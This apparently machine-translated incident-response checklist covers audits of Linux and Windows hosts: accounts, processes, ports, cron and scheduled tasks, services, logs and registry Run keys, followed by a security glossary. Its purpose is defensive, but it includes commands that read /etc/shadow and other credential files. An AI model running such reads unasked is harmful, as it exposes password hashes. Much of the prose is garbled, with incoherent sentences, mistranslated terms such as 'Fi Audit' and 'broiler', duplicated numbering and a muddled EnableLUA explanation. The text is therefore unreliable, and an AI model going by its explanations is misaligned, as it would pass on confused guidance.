Linux emergency response focus on examination of items
User accounts audit: cat / etc / passwd & cat / etc / shadow
Online account audit: w
Login audit situation: last
Audit blank password account: awk -F: '($ 2 == "") {print $ 1}' / etc / shadow
Do not allow an empty password checking account host configuration, although the empty account password temporarily did not find a way to use, but does not meet the level of protection of the basic principles.
Audit privileged accounts: awk -F: '($ 3 == 0) {print $ 1}' / etc / passwd
Linux is generally only root privileged account, if the account other than root emergence is a certain risk, suspected hackers create backdoor account.
Audit process: ps -ef (full format display all processes) or ps auxfww (show all processes and all the command line
Linux process audit is one of the important concerns of emergency, most security incidents will find a system running the malicious processes, tracking and analysis process is one of the necessary emergency response skills.
Port and associated audit process: lsof -p PID or lsof -i PORT
Linux when malicious processes are often carried out system socket is bound to open a local port external communications, usually suspect that some malicious process will run ports do correlation analysis
Fi Audit: netstat -ano | grep ESTABLISHED (see established network connection) or netstat -antlp | grep LISTEN (see port in the listening state)
Fi is also one of the emergency process focus point, which check for malicious IP (IP credibility with third-party libraries) "Foreign Address", the connection status, and whether or not there is an abnormality socket.
Scheduled Tasks Audit: crontab -l
Linux plan is to perform general tasks via cron, hackers modify cron purpose is to check whether the general authority to maintain and control the execution of malicious DDoS broiler or periodic operation of the system purposes.
System operation status of audit: top
Trojan horses and other programs on system cpu, memory, disk IO, network IO, etc. cause a certain degree of influence.
arp routing table audit: arp -a
arp is the Address Resolution Protocol, arp routing table records Linux system is the mac address and IP mapping, attackers often do by modifying the arp mapping middle attacks.
Linux audit log:
11.Linux audit log
1) / var / log / messages or / var / log / syslog system activity log
Search squid Activity Log.
2) /var/log/auth.log relates to a system log Authorization Authentication
Search failed authentication combined with IP point of view can be found in brute-force attack.
Search "incomplete message" keywords can be found openSSH username enumeration attacks.
3) / var / log / secure authorization system is mainly used for tracking, storing all security-related news and track sudo Information System Security Services Daemon records, SSH login, and other error messages.
View pam_unix (pam is the Linux dynamic load authentication module) session handle to open the records.
4) /var/log/boot.log system startup guidance information stored in the log
General security incidents rarely trigger this log, except for a few viruses, Trojans and other programs will do the MBR tampering.
5) / var / log / dmesg message comprises a kernel buffer hardware device or recording drivers infos
Such log analysis can be more difficult to ignore.
6) / etc / crontab plan tasks include periodic task information
Such logs and more vulnerable to tampering by hackers to execute scheduled tasks associated scripts, such as hackers execute scripts on the server once every minute to check for permission to maintain.
Emergency response focus on examination of items
Related Glossary:
1.windows domain (Domain):
Domain (Domain) is the unit operate independently of the Windows network, mutual visits between the domain you need to establish a trust relationship (ie Trust Relation). Trust as a bridge between the domain and the domain. when
After a domain established trust relationships with other domains, not only between the two domains can be managed with each other as needed, can also be cross-device network resource allocation files and printers, so that a total of network resources among different domains
Sharing and management, and the mutual communication and data transfer.
By running the command
2. Domain Controller (Domain controller)
In the "field" mode, at least one server is responsible for joining each user of the network computer and verification, as a unit corresponding to the guard, as the domain controller. Domain controller that contains a
Domain accounts, passwords, belongs to the domain of computers and other information including database. When the computer is linked to the network, the domain controller must first identify whether this computer is part of the domain, logon account used by the user
Number exist, the password is correct. If the above information does not have the same right, the domain controller will reject the user login from this computer. Can not log on, users will not have access permissions on the server security
Protection of resources, he can only peer users access to Windows to share out resources, thus protecting the resources on the network to a certain extent.
3. Command Prompt
In the command prompt windows system is an interactive program with the operating system command, by distributing commands to the operating system, system feedback and explain the implementation of a process, similar to Microsoft's DOS operating
For the system.
4.powershell
It can be seen as an upgraded version of the command prompt, provides API access to system variables and functions More Actions can only support .NET programming.
5..NET
.NET is Microsoft's next-generation technology platform to build applications for the interconnection of business agility, these systems are standards-based, Unicom, adapt to change, stable and high performance. From a technical
Angle, a .NET application is running on a .NET Framework application. (More precisely, a .NET application that uses .NET Framework Class Library is written and run in public
Common Language Runtime application on top of a total language runtime. ) If an application has nothing to do with the .NET Framework, it can not be called .NET program. For example, only uses
XML is not .NET applications using only a Web Service SOAP SDK calls nor .NET application. .NET platform is based on Windows operating system, used in the Internet division
Cloth type.
6. batch (batch)
Batch (Batch), also known as a batch script. As the name suggests, the batch is to batch processing of an object, usually considered a simplified scripting language used in DOS and Windows
System. Extended batch file called bat. Currently the more common batch contains two types: DOS Batch and PS batch. PS is based on the powerful batch image editing software Photoshop, used
Batch processing script pictures; and DOS batch is used to automatically execute DOS batch commands to implement specific actions based on the DOS command scripts. More complex cases, need to use if, for,
goto commands control program is running, as C, Basic and other high-level languages. If you want a more complex application, it is necessary to use an external program, which includes external commands provided by the system itself and
Tools or software provided by third parties. Although the batch program is run from the command line environment, but not be able to use the command-line software, any program can be run in the current system can be placed in a batch file
run.
7. scripting language (script)
In order to shorten the traditional scripting language is written - computer programming language during operation (edit-compile-link-run) created - compile - link. Its name originates from a script
"Screenplay", each run will repeat verbatim the dialog box. Early script languages were often called batch languages or job control language.
A script is usually interpreted rather than compiled. Scripting languages typically have a simple, easy to learn, easy to use features, the purpose is to allow programmers to quickly complete the preparation procedures. The macro language can be considered as foot
This language branch, both have substantial similarities.
8. Registry (Registry, Traditional Chinese version of the Windows operating system known as the registry)
Microsoft Windows registry is important in a database for setting information storage systems and applications. As early as the introduction of Windows 3.0 OLE technology of the time, the registry has been
appear. Followed by the launch of Windows NT was the first widely used system registry from the operating system level. However, starting with Microsoft Windows 95 operating system, registry really become
Content Windows users often contact, and in the subsequent operating system continue to be used today.
9. The process (process)
Process (Process) is a computer program run on a set of data on the activities of the system is the basic unit of resource allocation and scheduling, is the underlying operating system architecture. In early for
Computer architecture design process, the basic process is the execution entity program; thread in computer architecture for contemporary design, the process is the thread of the container. A program instructions, data organization and tracings
Above, the process is a solid program.
10. Shared Folders (share)
Shared folder is used to refer to a computer and other computers between each other to share a folder, so-called sharing is to share meaning. ,
11. Start item
Start the project, it is switched on when the system will run in the foreground or background programs. When the operating system to complete the login process, a lot of progress there has been in the process table. Operating system at boot time, automatically
Loaded with many programs. Since the launch of many programs, has brought us a lot of convenience, it is an indisputable fact, but not every program we have since the start of use; What is more, there may be a virus or Trojan in self
Start ranks.
12. Buffer Overflow
Buffer overflow (buffer overflow), is for program design flaws, the input buffer is written to the program so that it overflowed content (usually exceeding the maximum amount of data that can be stored in the data buffer),
Thereby undermining the program runs, taking advantage of the occasion interrupted and gain control over the program and the system.
13. interrupted
Interruption means the computer is running, there have to be some surprises when host intervention, the machine can automatically stop running programs and transferred to deal with the new situation of the program, processed and then returned to the original is suspended
The program continues to run.
14.API
API (Application Programming Interface, Application Programming Interface) is a function of a number of predefined object is to provide application developers with a software or hardware-based access to
The ability of a set of routines, but without having to access the source code, or to understand the details of the inner workings.
15. Communication port
With the development of computer network technology, the original physical interface (e.g., keyboard, mouse, network card, a display card input / output interface) can not meet the requirements of a communication network, TCP / IP as a network protocol
Standard protocol for communication to solve this communication problem. TCP / IP protocol integrated into the operating system kernel, which is equivalent to the introduction of a new input / output interface in the operating system technology, since the TCP / IP
Introduces a protocol called "the Socket (socket)" application program interface. With this technique, an interface, a computer may have calculated Socket interface with any computer by way of software
Machine communication. Port on the computer programming that is "Socket Interface."
16. Worm
Worm is a common computer viruses. It is using the Internet to replicate and spread, the infection is through the network and e-mail. The original worm virus definitions because the DOS environment, the virus
There will be something similar to a worm attack on the screen, random devour letters on the screen and change shape. Worm is self-contained program (or suite of programs), it can propagate copies of itself or functions
Some portions of itself to other computer systems (usually via a network connection).
17. Trojan
Trojans (Trojan), also known as Trojan refers to control another computer through a specific program (Trojan horses). Trojan usually two executable programs: a control terminal, the other is controlled
end. The name comes from the ancient Greek Trojan legend (the Trojan Horse story in Homer, Trojan The term Trojan horse intended to Troy, that on behalf of that Trojan horse, which is the story of the Trojan horse).
"Trojan horse" program is the more popular of the virus file, the virus is generally different, it does not reproduce itself, it does not "deliberately" to go to infect other files, it will attract users to download executed by their own camouflage
OK, to provide facilities Trojans open the gateway to the host species, the species can be applied to any person to destroy, steal files are the kinds of persons, and even remote control is the host species.
18. threat intelligence
What is the threat intelligence, in fact, been using security ring with them, vulnerability database, fingerprint database, IP reputation database, threat intelligence platform, they are all part of the threat intelligence. Intelligence is the clue, threat intelligence
Is to restore the attacks and predicted has happened clue attack did not occur as needed. "The so-called threat intelligence is to help us identify threats, and the corresponding knowledge disposal. This knowledge is what we
He said the threat intelligence. "
19. System Services
System services (system services) are programs that perform the specified system functions, routines or processes, in order to support other programs, particularly the bottom (close to the hardware) program. The provision of services through the network, services
It can be published in Active Directory (AD), so as to promote the management and use of service-center.
20.AD(Active Directory)
AD called the Active Directory, refer to the Windows server operating system directory service. Active Directory provides a range of centrally organized power management and directory services to access network resources
can. Active Directory can centrally manage access to network resources and allows users to log in only once to access all their resources on the Active Directory.
21. The virus signature
Can represent the characteristics of a virus classification code segment, typically by disassembly of virus executable file, find special assembly code and then reverse hexadecimal machine code as a characteristic value.
22. Reverse engineering (also known as reverse technology)
Is a product design reproduction, i.e., a target product of reverse research and analysis, and interpretation of results so that the processing flow of the product, structure, features and technical specifications to design
Elements to produce functionally similar, but not exactly the same product. Analysis of commercial and military hardware in the field of reverse engineering from. Its main purpose is not easily obtained in the case of the production of the necessary information, straight
Pick from product analysis, design principles derived products.
1. User accounts and group audit
1) Description: Hackers often the system will add the back door after the invasion account, you need to audit user and group if there are signs of tampering.
2) command: lusrmgr.exe
3) Check the following: Check for suspicious user name is created, check if there are suspicious administrators group account is authorized.
2. Since the launch configuration audit
1) Description: a hacker can modify configuration is typically loaded from the start hacker custom script after the system startup.
2) command: msconfig.exe or wmic start up list full
3) Check: Check the program information from the start, such as applications require unconventional locator position can be checked with the removal tool 360.
3. Abnormal audit process
1) Description: Emergency response processes are often one of the main concerns, hackers maintain external communications will open in a separate process was invaded host, the process name is often confused with sex, such as svch0st.exe (should be
Svchost.exe) or exp1orer.exe (should explorer.exe).
2) command: taskmgr.exe in the process menu or tasklist.exe
3) inspection methods: careful investigation likely to be infected with the Trojan system process, the process of locating the source location, with 360 anti-virus tools for killing, other processes uncertain process by google query function,
The probability of malicious programs will get threat intelligence.
4. Abnormal Audit Service
1) Description: windows service daemon Linux-like, hackers create custom services aim to achieve sustainable control of broilers by malicious programs.
2) command: services.msc
3) inspection methods: conventional service system for windows to understand, identify viruses often create a naming service, such as: "xxxUpdate" with such keywords. Tip: Check the specified system service
The property, see the service description, service description if little or relatively non-official language, tend to be more suspicious. Or view dependencies for using the RPC (Remote Procedure Call) services should focus on
attention.
5. Scheduled Tasks audit
1) Description: The scheduled task management program is a series of operations performed periodically computer, the hacker also plans to add custom tasks to detect the connection heartbeat or launch DoS attacks and other acts.
2) command: schtasks.exe or GUI mode found in the Control Panel> Scheduled Tasks
3) inspection methods: understanding the system program comes with the program tasks, view task corresponding folder, control task creation time, the release of documents and other information to determine whether the program is malicious tasks.
6. Run state audit system
1) Description: Trojan virus causes the system CPU, memory, disk read and write, network utilization is high IO under normal circumstances, it can be found potentially malicious programs by monitoring the system status.
2) command: taskmgr.exe
3) Check the following: Check Task Manager menu performance, within the tracking unit time CPU, memory, disk, network operation, and turn on the monitor with the inspection.
6. The user session audit
1) Description: hacker by 3389 the system will create a user login session, through the audit session to see if there is an attacker to remotely log on.
2) command: query user
3) inspection methods: Enter the command to see if the session is abnormal, if there is suspicious user session state.
7. Network connection audit
1) Description: audit network connection information can be found attacker source IP, and open ports, processes and so on.
2) command: netstat -ano
3) inspection methods: Enter the command to check for suspicious external IP in "ESTABLISTHED" state.
8. Local Shared Audit
1) Description: The classic early hackers use IPC $ attacks bulk implanted broiler.
2) command: net share and net use
3) Check: Enter net share check which shared local open, net use checks whether there is an input network connection is mapped.
9. Group Policy Auditing
1) Description: It is a feature of Microsoft Windows NT family of operating systems, it can control the working environment of user and computer accounts. Group Policy provides the operating system, applications, and with Active Directory
Centralized management and configuration set by the user. Group Policy is a version called the Local Group Policy (abbreviation "LGPO" or "LocalGPO"), which can be independent and computer management of Group Policy to non-domain
Like. .
2) command: gpedit.msc
3) inspection methods: Open the Group Policy panel, focus your script submenu Computer Configuration and User Configuration, and see if the load powershell script, the script content analysis to determine whether abnormalities.
10. Log Audit
1) Description: windows log contains system logs, security logs, application logs, usually a query through the windows built-in Event Viewer.
2) command: eventvwr
3) inspection methods: open windows log viewer, according to the time interval screened windows log security events occur, the general focus your "safe", "application" Log, malicious hackers to execute commands more
The number is recorded in both log.
Generally windows built-in log viewer displays not very friendly and do not facilitate the analysis, it is usually with 32 or 64-bit version of the log analysis tool LogParser.exe, can be downloaded in the corresponding Microsoft's official website.
You can query the log information as the operation of the database after installation as well.
Since the problem is often the default log path location c: \ Windows \ system32 \ winevt \ Logs \ log files are copied to the C root directory of analysis:
10. Audit Registry
1) Description: windows registry is a database storage system and setting information application, is configured by pairs.
2) command: regedit.exe
3) Check: Enter command to open the program registry, a registry key under the specified path or manual inspection with the inspection antivirus software.
E.g:
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run to see what programs since the launch of the system
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System check EnableLUA value (0: UAC, 1: Start UAC)
\ \ CurrentControlSet \ Control under HKEY_LOCAL_MACHINE \ System \ SessionManager see if there ExcludeFromKnownDlls, there is lpk.dll if there is value,
usp10.dll, msimg32.dll, midimap.dll, ksuser.dll, comres.dll, ddraw.dll these dll, it is determined abnormal.